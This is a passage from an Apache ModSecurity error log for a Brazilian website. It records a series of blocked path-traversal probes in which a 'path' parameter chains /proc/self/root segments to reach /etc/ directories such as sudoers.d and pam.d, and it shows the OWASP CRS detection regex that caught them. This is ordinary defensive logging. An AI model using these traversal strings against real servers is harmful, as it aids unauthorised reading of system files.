[Fri Mar 20 12:12:44.632017 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:36814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j7PHIg5MgXLBnicMq_AAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:46.017121 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.241.31:36826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j7vHIg5MgXLBnicMrCQAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:48.539936 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:56274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j8PHIg5MgXLBnicMrFgAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:48.709894 2026] [mime_magic:error] [pid 9818:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:59572] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:12:50.987017 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.241.31:56276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j8hCii7xarUs8iHahSAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:53.364949 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.241.31:56278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j9Lninkcc-iUj5AqSNgAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:12:55.587919 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.110:59982] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1j9_XLqtnMIWvjpaLTIQAAApI"]
[Fri Mar 20 12:12:58.291688 2026] [mime_magic:error] [pid 15826:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:60182] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:13:00.613223 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:56286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j_AF0L0L-SsrnPo6eygAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:02.004868 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:39520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j_vqxLDW4GITHUkQhqgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:04.142870 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.241.31:39524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1j__HIg5MgXLBnicMrJwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:07.803238 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.241.31:39534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kA_qxLDW4GITHUkQhrwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:08.302885 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:39534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kBPqxLDW4GITHUkQhsAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:09.588480 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.241.31:56234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kBfHIg5MgXLBnicMrMQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:10.895462 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:56244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kBvqxLDW4GITHUkQhsQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:12.302843 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:56248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kCLninkcc-iUj5AqSQAAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:16.075893 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:56260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kDPqxLDW4GITHUkQhtAAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:13:19.558529 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:55924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kD11pVZ5mVmJwsFNkygAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:20.889348 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.241.31:55932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kEDJ3M9BSuKP7CAZf_wAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:13:22.195335 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.241.31:55936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kEhCii7xarUs8iHahYAAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:13:24.517508 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.241.31:55940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kFPHIg5MgXLBnicMrMwAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:13:26.908941 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.241.31:55942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kFgF0L0L-SsrnPo6e0wAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:13:28.691750 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:40464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1kGLninkcc-iUj5AqSRQAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:13:30.116264 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:40480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 